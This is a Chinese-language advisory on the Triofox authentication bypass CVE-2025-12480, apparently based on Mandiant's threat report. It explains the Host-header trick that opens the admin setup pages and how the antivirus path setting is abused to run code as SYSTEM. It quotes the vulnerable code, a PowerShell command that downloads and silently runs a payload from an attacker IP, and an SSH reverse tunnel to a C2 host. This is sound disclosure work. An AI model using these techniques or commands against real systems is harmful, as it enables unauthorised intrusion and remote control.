Triofox 高危零日漏洞CVE-2025-12480
Triofox是一款企业级文件共享与远程访问平台,功能包括无缝数据同步、全球文件锁定、安全移动访问等,旨在提升跨地域团队协作效率 。
一、基本情况
Triofox 为法律、基因组学和保险行业提供了革命性的文件共享解决方案,这些解决方案安全、可扩展,并且能够与现有基础设施无缝集成。
Triofox 使得从服务器直接进行高效的大文件共享成为可能,提升生产力和安全性,可定制的功能满足独特的商业需求,将挑战转化为机遇。
栋科技漏洞库关注到Triofox版本低于16.7.10368.56560存在不当访问控制漏洞,该漏洞已被追踪为CVE-2025-12480,CVSS 3.X评分9.1。
二、漏洞分析
CVE-2025-12480漏洞是Gladinet 公司的 Triofox 文件共享平台中存在一个严重的未授权访问漏洞,已被威胁组织 UNC6485 积极在野利用。
CVE-2025-12480漏洞由云安全运营部门旗下 Mandiant 威胁防御团队披露,漏洞源于Triofox Web界面中访问控制检查的不安全实现所致。
版本在 16.7.10368.56560 版本修复前均存在漏洞,攻击者通过链式攻击路径绕过身份验证、创建管理员账户并实现 SYSTEM 级代码执行。
1、漏洞拆解
Mandiant 团队的安全人员在HTTP日志文件中发现了一个异常条目——一个可疑的HTTP GET请求,其HTTP Referer URL包含localhost。
在来自外部源的请求中,localhost主机头的存在是非常不规则的,通常在合法流量中是不期望的。
GET /management/CommitPage.aspx - 443 - 85.239.63[.]37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.4951.41+Safari/537.36 http://localhost/management/AdminAccount.aspx 302 0 0 56041Mandiant指出,在测试环境中向AdminAccount.aspx发出的标准HTTP请求会导致重定向到“拒绝访问”页面,这表明该页面上存在访问控制。
作为设置的一部分,从AdminDatabase.aspx的初始配置页面授予对AdminAccount.aspx页面的访问权限。
首次安装Triofox软件后,AdminDatabase.aspx页面会自动启动,此页面允许用户设置Triofox实例。
除了其他详细信息外,还可以使用数据库选择(Postgres或MySQL)、连接LDAP帐户或创建新的本机集群管理员帐户等选项。
尝试浏览到AdminDatabase.aspx页面会导致类似的重定向到拒绝访问页面。
Mandiant通过测试设置过程的工作流程验证了该漏洞。Host标头字段由web客户端提供,攻击者可以轻松修改。
这种技术被称为HTTP主机头攻击。将Host值更改为localhost将授予对AdminDatabase.aspx页面的访问权限。
通过遵循设置过程并通过AdminDatabase.aspx页面创建新数据库,可以授予对管理员初始化页面AdminAccount.aspx的访问权限。
然后,该页面会重定向到InitAccount.aspx页面以创建新的管理员帐户。
对代码库的分析表明,对AdminDatabase.aspx页面的主要访问控制检查是由GladPageUILib中的函数CanRunCrticalPage()控制的。
在C:\Program Files (x86)\Triofox\portal\bin\GladPageUILib.dll中找到GladBasePage类。
public bool CanRunCriticalPage()
{
Uri url = base.Request.Url;
string host = url.Host;
bool flag = string.Compare(host, "localhost", true) == 0; //Access to the page is granted if Request.Url.Host equals 'localhost', immediately skipping all other checks if true
bool result;
if (flag)
{
result = true;
}
else
{
//Check for a pre-configured trusted IP in the web.config file. If configured, compare the client IP with the trusted IP to grant access
string text = ConfigurationManager.AppSettings["TrustedHostIp"];
bool flag2 = string.IsNullOrEmpty(text);
if (flag2)
{
result = false;
}
else
{
string ipaddress = this.GetIPAddress();
bool flag3 = string.IsNullOrEmpty(ipaddress);
if (flag3)
{
result = false;
}
else
...如代码片段所述,该代码存在几个漏洞:
主机头攻击-ASP。NET构建请求。HTTP主机标头中的Url,攻击者可以修改该Url。
无来源验证-不检查请求是来自实际的本地主机连接还是伪造的标头。
配置依赖性-如果未配置TrustedHostIP,则唯一的保护是主机标头检查。
2、Triofox防病毒功能滥用
为了实现代码执行,攻击者使用新创建的管理员帐户登录。攻击者上传恶意文件,使用内置的防病毒功能执行这些文件。
要设置防病毒功能,允许用户为所选防病毒软件提供任意路径。
配置为防病毒扫描程序位置的文件继承了Triofox父进程帐户权限,在SYSTEM帐户的上下文中运行。
攻击者能够通过配置反病毒引擎的路径来指向他们的脚本,从而运行他们的恶意批处理脚本。
在Triofox应用程序中发布新共享时,将显示任何共享文件夹在磁盘上的文件夹路径。
然后,通过将任意文件上传到Triofox实例中的任何已发布共享,将执行配置的脚本。
SecOps telemetry recorded the following command-line execution of the attacker script:
C:\Windows\system32\cmd.exe /c ""c:\triofox\centre_report.bat" C:\Windows\TEMP\eset_temp\ESET638946159761752413.av"三、POC概念验证
1、支持工具部署
攻击者脚本centre_report.bat执行了以下PowerShell命令以下载并执行第二阶段有效负载:
powershell -NoProfile -ExecutionPolicy Bypass -Command "$url = 'http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.zip'; $out = 'C:\\Windows\appcompat\SAgentInstaller_16.7.10368.56560.exe'; Invoke-Wepequest -Uri $url -OutFile $out; Start-Process $out -ArgumentList '/silent' -Wait"PowerShell下载程序旨在:
从下载有效载荷http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.zip,尽管有zip扩展名,但它托管了一个伪装的可执行文件
将负载保存到:C:\Windows\appcompat\SAgentInstaller_16.7.10368.56560.exe
静默执行有效载荷
执行的有效负载是Zoho统一端点管理系统(UEMS)软件安装程序的合法副本。
攻击者使用UEMS代理在主机上部署Zoho Assist和Anydesk远程访问实用程序。
2、侦察和特权升级
攻击者使用Zoho Assist运行各种命令来枚举活动的SMB会话以及特定的本地和域用户信息。
3、防御规避
攻击者将sihosts.exe和silcon.exe(来源于合法域.eearth[.]li)下载到目录C:\windows\temp\中。
这些工具用于建立加密隧道,通过SSH通过端口433将受感染的主机连接到其命令和控制(C2或C&C)服务器。
然后,C2服务器可以通过隧道将所有流量转发到端口3389上的受感染主机,允许入站RDP流量。
使用以下参数运行命令:
管理员已设置登录后刷新可查看C:\windows\temp\silcon.exe -ssh -P 433 -l <REDACTED> -pw <REDACTED>-R 216.107.136[.]46:17400:127.0.0.1:3389 216.107.136[.]46[/lv]
四、影响范围
Triofox <= 16.4.10317.56372
五、修复建议
Triofox >= 16.7.10368.56560
六、参考链接
管理员已设置登录后刷新可查看